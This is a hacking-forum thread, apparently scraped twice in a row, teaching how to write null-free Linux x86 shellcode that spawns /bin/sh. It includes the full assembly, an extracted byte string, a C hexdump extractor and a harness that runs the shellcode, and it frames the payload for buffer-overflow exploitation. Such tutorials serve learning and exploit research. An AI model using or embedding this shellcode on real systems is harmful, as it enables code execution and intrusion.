E-Book Leaks
Linux Shellcoding
Submitted by Officer Marles, 03-01-2018, 09:09 PM, Thread ID: 68193
Thread Closed
Requirements
Alright so this isn't going to be msfvenom tutorial. (shellcodes are payloads).
This tutorial will focus on writing shellcodes using Assembly.
Knowledge of C and Assembly is highly recommend. Also knowing how the stack works is a big plus.
Memory Segments
When a program is run it is loaded in the RAM. Normally 5 segments are used in programs:
With assembly you have total control over these segments.
In shellcoding however we will only be using the text and the stack segment.
Assembly primer
So first we need to know some assembly.
The registers
We will be focusing on a couple of registers:
These registers are like little pieces of memory that are in the CPU.
They have nothing to do with RAM though as they are part of the CPU.
The CPU uses these registers to do calculations and perform simple algorithms.
In assembly we adress these registers, they can be thought of as variables.
Assembly instructions
There are some instructions that are important in assembly programming:
Be sure that you understand these concepts.
You can ofcourse try to learn what they mean from this tutorial,
but it's better to take your time to learn about these from a more in depth source.
Syscalls
What is important in shellcoding, is making use of syscalls.
Syscalls are functions that the kernel recognizes, this means that if your shellcode calls a syscall,
you don't have to include headers or declare them.
here: http://syscalls.kernelgrok.com/170 you can find an overview of all linux x86 syscalls, look up syscall 11 (0xB).
A syscall takes arguments like normal functions, however syscalls are different in that they don't use the stack.
You can think of syscall parameters like argv[] in C:
argv[0] the 'first' argument (your program in C), would be the EAX register.
This is also where you load the syscall number, for execve this is 11, or 0xB in hexa.
argv[1] is like the second argument and would be the EBX register. For example the string "/bin/bash",
note that a string in C is called as a pointer, for example char *s = "Hello World".
The variable 's' is a pointer and NOT the actual string, it's a memory adress where the string is stored.
s could be something like 0x4000b401. On 0x4000b401 you'd then find the value '/' or 0x2f in hexa.
This get's read until the nullbyte 0x00. The actual string would never fit in the 32 bit registry.
The third argument is ECX, for execve this would be the arguments for the program that gets called (also a string).
A too simple shellcode
A shellcode is in many ways similar to a normal program, except for the fact that it uses the virtual space used by the program you are exploitating (so not his own).
The name shellcode is kind of misleading, it implies shellcodes are used to spawn shells, however nowadays there are many other uses for shellcodes,
like
a certain program, or
and
a file, nevertheless 'shellcode' was the name that stick.
Today we will be writing a simple shellcode that spawns a shell.
First though, we will write a normal assembly program. You will need nasm installed on your machine to compile it.
.
So here is the assembly program:
Copy and paste it in an editor and save as shell.asm
To compile it use the following commands:
Now run it with:
Awesome, a shell. This is what we wanted!, easy right?
Now lets try to extract the shellcode.
To do so use the command:
This will result in:
69
Lets look at the 2nd line in _start, instead of msg, it says 0x80490a0. This the memory adress of the string msg.
This is a problem though. Remember that I said a shellcode doesnt use it's own virtual space, but that of the program?
This means, that the adress 0x80490a0 probably contains either garbage or nothing.
Since the .data segment of our assembly program isn't used in the shellcode.
The shellcode would be:
Now we face another problem, nullbytes.
Eliminating nullbytes
Compile and run.
Result:
So what happened here? If you've programmed with C you may know the problem here, strings use \x00 for terminating.
In a bufferoverflow, the shellcode (which is a string) gets loaded on the stack.
Therefore a nullbyte will terminate the chain of instructions.
So now let's look at our program once again.
XOR
Like I said earlier XOR is an assembly instruction.
XOR is like OR, however there is one major difference.
Let's look at two tables.
and
So how is this relevant? Well remember that you can't use nullbytes.
So if you want to put 0 in a register, doing MOV EAX, 0, would cause a nullbyte.
Lets say the EAX register looks like this:
...0010001101
XOR'ing EAX with itself would cause each bit to XOR itself.
the bit is either 1 or 0.
Therefore every bit gets set to 0.
Doing so would be the same as mov eax, 0, but without the use of nullbytes.
Now let's look at the code objdump once again.
Notice that the operation MOV EAX, 0xb, still gives nullbytes as a result.
The reason for this is the fact that EAX is a 32 bit register.
You can read the line b8 0b 00 00 00 as:
b8 (EAX) 0b (11) 00 00 00 which translates to: EAX = 00 00 00 0b, which translates to EAX = 11, or MOV EAX, 0xb.
Adressing Lower Halves of Registries
If you're already familiar with assembly you might've read that EAX's lower half can also be used for instructions.
This lower half is called AX and is 2 bytes (16 bits) in size.
AX can also be split. the higher half is called AH and the lower half is called AL.
Think of it like this:
So in order to assign 11 to EAX, we have to combine the things we discussed.
First we need to make sure EAX doesn't contain garbage values.
To do so we zero EAX out with the XOR operator.
XOR EAX, EAX
Now we can assign 11 to the lower half of EAX.
MOV AL, 0xb (11)
Using the Stack to Store Variables
So we already have the first argument for our syscall ready.
Now we need to assign a string pointer to EBX, but before we do that, we need something to point to, that is, the actual character array:
The only dynamic memory we can use for this is the stack.
Note that each ascii character has a corresponding hex value, a table can be found http://www.asciitable.com/21 here.
from left to right the hexcodes are:
0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00.
What we can do is push these on the stack. Then we can use the stack pointer ESP as a string pointer.
Because the stack is FILO and grows downwards, we have to assign the values in reverse order.
To push values on the stack you can use the command PUSH:
PUSH , be aware that you can only push 4 bytes, each time.
Now a problem arises. You cant push "/sh\x00" on the stack. as it will terminate the shellcode.
To do so, we have to go back a few steps and look at our first two lines:
Notice that after XOR EAX, EAX, EAX will have the value 0.
In shellcoding it is sometimes wiser to use this to our advantage as long as possible, because we now have a 0 we can assign, with this in mind we will postpone the COMMAND MOV AL, 0xb.
So instead of pushing 0x0068732f ("\x00hs/") on the stack. we split it in two parts: 0x00 and 0x68732f.
Now instead of doing PUSH 0x00, we do PUSH EAX.
It has the same result, but we avoided a nullbyte.
Next we can do:
Now the the stack pointer will point to the string "/bin//sh".
So this will be our 2nd argument (EBX).
The third argument (ECX) for our syscall execve is a string with arguments for /bin/sh. Ofcourse we don't want this to contain garbage, because that would result in sh not running and giving a warning about invalid arguments. Therefore we need ECX to be 0.
Once again we can use our EAX register.
Finally we assign EAX:
And do the syscall;
This leaves us with the following code:
Extracting the Shellcode
Now let's compile it
Now to get the shellcode I wrote this C program:
It will ignore caves of nullbytes and only show continues hexdumps.
One of these lines is your shellcode.
To check if your shellcode works you can use this simple C program:
That was all for today, hope you enjoyed it!
Alright so this isn't going to be msfvenom tutorial. (shellcodes are payloads).
This tutorial will focus on writing shellcodes using Assembly.
Knowledge of C and Assembly is highly recommend. Also knowing how the stack works is a big plus.
Memory Segments
When a program is run it is loaded in the RAM. Normally 5 segments are used in programs:
Code:
The stack segment (For function calls (dynamic)).
The heap segment (For dynamicly allocating memory).
The data segment (Variables).
The bss segment (Variables).
The text segment (Set of instructions (The actual code)).
In shellcoding however we will only be using the text and the stack segment.
Assembly primer
So first we need to know some assembly.
The registers
We will be focusing on a couple of registers:
Code:
The EAX register
The EBX register
The ECX register
The EDX register
The ESP register
They have nothing to do with RAM though as they are part of the CPU.
The CPU uses these registers to do calculations and perform simple algorithms.
In assembly we adress these registers, they can be thought of as variables.
Assembly instructions
There are some instructions that are important in assembly programming:
Code:
MOV (assign, for example MOV EAX, 32 (EAX = 32)).
XOR (Exclusive OR, for example XOR EAX, EAX)
PUSH (Push something on the stack, example: PUSH EAX).
POP (Load what was on the stack in a register/variable, example: POP EBX).
CALL (Call a function, for example: CALL FuncPrint).
INT (Interrupt, kernel command, for example INT 0x80 which is used in calling syscalls).
You can ofcourse try to learn what they mean from this tutorial,
but it's better to take your time to learn about these from a more in depth source.
Syscalls
What is important in shellcoding, is making use of syscalls.
Syscalls are functions that the kernel recognizes, this means that if your shellcode calls a syscall,
you don't have to include headers or declare them.
here: http://syscalls.kernelgrok.com/170 you can find an overview of all linux x86 syscalls, look up syscall 11 (0xB).
A syscall takes arguments like normal functions, however syscalls are different in that they don't use the stack.
You can think of syscall parameters like argv[] in C:
argv[0] the 'first' argument (your program in C), would be the EAX register.
This is also where you load the syscall number, for execve this is 11, or 0xB in hexa.
argv[1] is like the second argument and would be the EBX register. For example the string "/bin/bash",
note that a string in C is called as a pointer, for example char *s = "Hello World".
The variable 's' is a pointer and NOT the actual string, it's a memory adress where the string is stored.
s could be something like 0x4000b401. On 0x4000b401 you'd then find the value '/' or 0x2f in hexa.
This get's read until the nullbyte 0x00. The actual string would never fit in the 32 bit registry.
The third argument is ECX, for execve this would be the arguments for the program that gets called (also a string).
A too simple shellcode
A shellcode is in many ways similar to a normal program, except for the fact that it uses the virtual space used by the program you are exploitating (so not his own).
The name shellcode is kind of misleading, it implies shellcodes are used to spawn shells, however nowadays there are many other uses for shellcodes,
like
Code:
chmod 777
Code:
download
Code:
execute
Today we will be writing a simple shellcode that spawns a shell.
First though, we will write a normal assembly program. You will need nasm installed on your machine to compile it.
Code:
sudo apt-get install nasm
So here is the assembly program:
Code:
section .data
msg db '/bin/sh' ; db stands for define byte, msg will now be a string pointer.
section .text
global _start ; Needed for compiler, comparable to int main()
_start:
mov eax, 11 ; eax = 11, think of it like this mov [destination], [source], 11 is execve
mov ebx, msg ; Load the string pointer into ebx
mov ecx, 0 ; no arguments in exc
int 0x80 ; syscall
mov eax, 1 ; exit syscall
mov ebx, 0 ; no errors
int 0x80 ; syscall
To compile it use the following commands:
Code:
nasm -f elf -o shell.o shell.asm
Code:
ld -o shell shell.o
Now run it with:
Code:
./shell
Now lets try to extract the shellcode.
To do so use the command:
Code:
objdump -M intel -d shell
This will result in:
69
Lets look at the 2nd line in _start, instead of msg, it says 0x80490a0. This the memory adress of the string msg.
This is a problem though. Remember that I said a shellcode doesnt use it's own virtual space, but that of the program?
This means, that the adress 0x80490a0 probably contains either garbage or nothing.
Since the .data segment of our assembly program isn't used in the shellcode.
The shellcode would be:
Code:
"\xb8\x0b\x00\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\x00\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
Now we face another problem, nullbytes.
Eliminating nullbytes
Code:
#include <stdio.h>
int main()
{
printf("Hello\x00 World!");
return 0;
}
Result:
Code:
Hello
In a bufferoverflow, the shellcode (which is a string) gets loaded on the stack.
Therefore a nullbyte will terminate the chain of instructions.
So now let's look at our program once again.
XOR
Like I said earlier XOR is an assembly instruction.
XOR is like OR, however there is one major difference.
Let's look at two tables.
Code:
OR:
1 OR 1 = 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0
Code:
XOR:
1 XOR 1 = 0
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
So if you want to put 0 in a register, doing MOV EAX, 0, would cause a nullbyte.
Lets say the EAX register looks like this:
...0010001101
XOR'ing EAX with itself would cause each bit to XOR itself.
the bit is either 1 or 0.
Code:
1 XOR 1 = 0.
0 XOR 0 = 0.
Doing so would be the same as mov eax, 0, but without the use of nullbytes.
Now let's look at the code objdump once again.
Notice that the operation MOV EAX, 0xb, still gives nullbytes as a result.
The reason for this is the fact that EAX is a 32 bit register.
You can read the line b8 0b 00 00 00 as:
b8 (EAX) 0b (11) 00 00 00 which translates to: EAX = 00 00 00 0b, which translates to EAX = 11, or MOV EAX, 0xb.
Adressing Lower Halves of Registries
If you're already familiar with assembly you might've read that EAX's lower half can also be used for instructions.
This lower half is called AX and is 2 bytes (16 bits) in size.
AX can also be split. the higher half is called AH and the lower half is called AL.
Think of it like this:
Code:
[---16bits---|--AH-8bits-|--AL-8bits-]
[---16bits---|-------16bits-AX-------]
[-----------32bits---EAX-------------]
First we need to make sure EAX doesn't contain garbage values.
To do so we zero EAX out with the XOR operator.
XOR EAX, EAX
Now we can assign 11 to the lower half of EAX.
MOV AL, 0xb (11)
Using the Stack to Store Variables
So we already have the first argument for our syscall ready.
Now we need to assign a string pointer to EBX, but before we do that, we need something to point to, that is, the actual character array:
Code:
|'/'|'b'|'i'|'n'|'/'|'s'|'h'|\x00|
Note that each ascii character has a corresponding hex value, a table can be found http://www.asciitable.com/21 here.
from left to right the hexcodes are:
0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00.
What we can do is push these on the stack. Then we can use the stack pointer ESP as a string pointer.
Because the stack is FILO and grows downwards, we have to assign the values in reverse order.
To push values on the stack you can use the command PUSH:
PUSH , be aware that you can only push 4 bytes, each time.
Now a problem arises. You cant push "/sh\x00" on the stack. as it will terminate the shellcode.
To do so, we have to go back a few steps and look at our first two lines:
Code:
XOR EAX, EAX
MOV AL, 0xb
In shellcoding it is sometimes wiser to use this to our advantage as long as possible, because we now have a 0 we can assign, with this in mind we will postpone the COMMAND MOV AL, 0xb.
So instead of pushing 0x0068732f ("\x00hs/") on the stack. we split it in two parts: 0x00 and 0x68732f.
Now instead of doing PUSH 0x00, we do PUSH EAX.
It has the same result, but we avoided a nullbyte.
Next we can do:
Code:
PUSH 0x68732f2f (Added a / here to avoid a nullbyte).
PUSH 0x6e69622f
So this will be our 2nd argument (EBX).
Code:
MOV EBX, ESP
Once again we can use our EAX register.
Code:
MOV ECX, EAX
Code:
MOV AL, 0xb
Code:
INT 0x80
Code:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov ecx, eax
mov al, 0xb
int 0x80
Now let's compile it
Code:
nasm -f elf -o shell.o shell.asm
Code:
ld -o shell shell.o
Code:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char *argv[])
{
char l = 1;
unsigned char buf;
int fd;
fd = open(argv[1],0,S_IRUSR);
while(read(fd,&buf,1)) {
if(buf == 0 && l == 1) {
printf(" \n");
l = 0;
}
else if(buf) {
printf("\\x%02x",buf);
l = 1;
}
}
close(fd);
}
One of these lines is your shellcode.
To check if your shellcode works you can use this simple C program:
Code:
int main()
{
char *shellcode = "<the shellcode>";
(*(void(*)()) shellcode)();
}
Users browsing this thread: 2 Guest(s)